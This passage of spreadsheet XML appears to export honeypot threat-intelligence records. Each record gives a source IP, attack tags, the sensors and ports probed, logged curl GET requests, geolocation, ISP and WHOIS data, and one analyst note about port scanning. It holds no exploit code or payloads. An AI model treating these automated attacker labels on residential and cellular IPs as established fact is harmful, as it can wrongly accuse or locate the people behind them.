    <s v="SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H44"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CT"/>
    <s v="Connecticut"/>
    <s v="Greater Bridgeport Planning Region"/>
    <s v="Bridgeport"/>
    <s v="5282804"/>
    <s v="06602"/>
    <s v="41.1792"/>
    <s v="-73.1894"/>
    <s v="6128"/>
    <s v="Cablevision Systems Corp."/>
    <s v="Optimum Online (Cablevision Systems)"/>
    <s v="cellular"/>
    <s v="Optimum WiFi"/>
    <s v="2012-02-29"/>
    <s v="NETBLK-WIFI-BLK6"/>
    <s v="2012-02-29"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1996-10-07 04:00:00"/>
    <s v="2025-10-06 04:00:00"/>
    <s v="2024-10-06 14:30:18"/>
    <s v="['AUTHNS1.CV.NET', 'AUTHNS1.CVNET.COM']"/>
    <s v="GoDaddy.com, LLC"/>
    <s v="['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientRenewProhibited https://icann.org/epp#clientRenewProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited']"/>
    <s v="Registration Private"/>
    <x v="20"/>
    <s v="NA"/>
    <s v="['DomainsByProxy.com', '100 S. Mill Ave, Suite 1600']"/>
    <s v="::ffff:2f12:3edd"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1145"/>
    <x v="1145"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T14:59:23"/>
    <d v="2025-02-17T09:41:34"/>
    <d v="2025-04-22T14:59:23"/>
    <n v="22"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="30"/>
    <s v="Daejeon"/>
    <s v="NA"/>
    <s v="Daejeon"/>
    <s v="1835235"/>
    <s v="NA"/>
    <s v="36.3491"/>
    <s v="127.385"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2002-08-29"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc5a:ba6d"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1146"/>
    <x v="1146"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T14:53:32"/>
    <d v="2025-02-08T14:13:53"/>
    <d v="2025-04-22T14:53:32"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Chennai"/>
    <s v="1264527"/>
    <s v="600001"/>
    <s v="13.0827"/>
    <s v="80.2707"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel Ltd."/>
    <s v="residential"/>
    <s v="BHARTI"/>
    <s v="2004-01-09"/>
    <s v="BHARTI-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (203.101.44.198,56598)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cb65:2cc6"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1147"/>
    <x v="1147"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T14:11:36"/>
    <d v="2024-12-29T03:49:45"/>
    <d v="2025-04-22T14:11:36"/>
    <n v="165"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="23&amp;&amp;9100&amp;&amp;80&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;NA&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d3e6:38f0"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1148"/>
    <x v="1148"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T14:10:42"/>
    <d v="2024-08-02T20:33:00"/>
    <d v="2025-04-22T14:10:42"/>
    <n v="592"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;57655&amp;&amp;21&amp;&amp;3306&amp;&amp;53888&amp;&amp;3060&amp;&amp;80&amp;&amp;NA&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Jeongja-dong)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.3638"/>
    <s v="127.116"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="KORNET"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d3e4:f502"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1149"/>
    <x v="1149"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T14:01:17"/>
    <d v="2023-12-06T16:50:00"/>
    <d v="2025-04-22T14:01:17"/>
    <n v="1393"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;445&amp;&amp;34174&amp;&amp;1433&amp;&amp;60503&amp;&amp;60498"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Okhla Phase III)"/>
    <s v="1261481"/>
    <s v="110049"/>
    <s v="28.5491"/>
    <s v="77.2687"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="residential"/>
    <s v="Abts Delhi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (122.160.172.92,55409)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa0:ac5c"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1150"/>
    <x v="1150"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T13:33:42"/>
    <d v="2023-10-04T04:22:00"/>
    <d v="2025-04-22T13:33:42"/>
    <n v="1086"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;39198&amp;&amp;80&amp;&amp;26745"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="NA"/>
    <s v="Seoul (Toegye-ro)"/>
    <s v="1835848"/>
    <s v="NA"/>
    <s v="37.5614"/>
    <s v="126.996"/>
    <s v="9318"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="business"/>
    <s v="broadNnet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '127.0.0.1', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1e7:de14"/>
    <s v="None"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1151"/>
    <x v="1151"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T13:25:36"/>
    <d v="2023-11-28T11:26:09"/>
    <d v="2025-04-22T13:25:36"/>
    <n v="375"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="26951&amp;&amp;61074&amp;&amp;23&amp;&amp;33838&amp;&amp;33863&amp;&amp;33909&amp;&amp;33879&amp;&amp;33895&amp;&amp;33919&amp;&amp;34543&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="2010-01-27"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:afc8:d01c"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1152"/>
    <x v="1152"/>
    <s v="NA&amp;&amp;125-228-165-220.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-22T11:21:58"/>
    <d v="2025-01-22T07:27:07"/>
    <d v="2025-04-22T11:21:58"/>
    <n v="140"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET: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7de4:a5dc"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1153"/>
    <x v="1153"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T10:13:07"/>
    <d v="2023-12-11T18:12:00"/>
    <d v="2025-04-22T10:13:07"/>
    <n v="909"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;64421&amp;&amp;9100&amp;&amp;NA&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc78:3076"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The attacker is likely scanning for open services and testing credentials on various systems, including databases and network devices. They are also attempting to exploit vulnerabilities and gain unauthorized access. &amp;&amp; The attacker is attempting to scan and gather information about various services on the targeted network, potentially using tools like Nmap or Nikto to identify vulnerabilities. They are probing for open ports and sending malicious requests to exploit potential weaknesses."/>
    <s v="Port scanning and service scanning"/>
  </r>
  <r>
    <x v="1154"/>
    <x v="1154"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T10:12:20"/>
    <d v="2024-04-16T11:32:12"/>
    <d v="2025-04-22T10:12:20"/>
    <n v="252"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
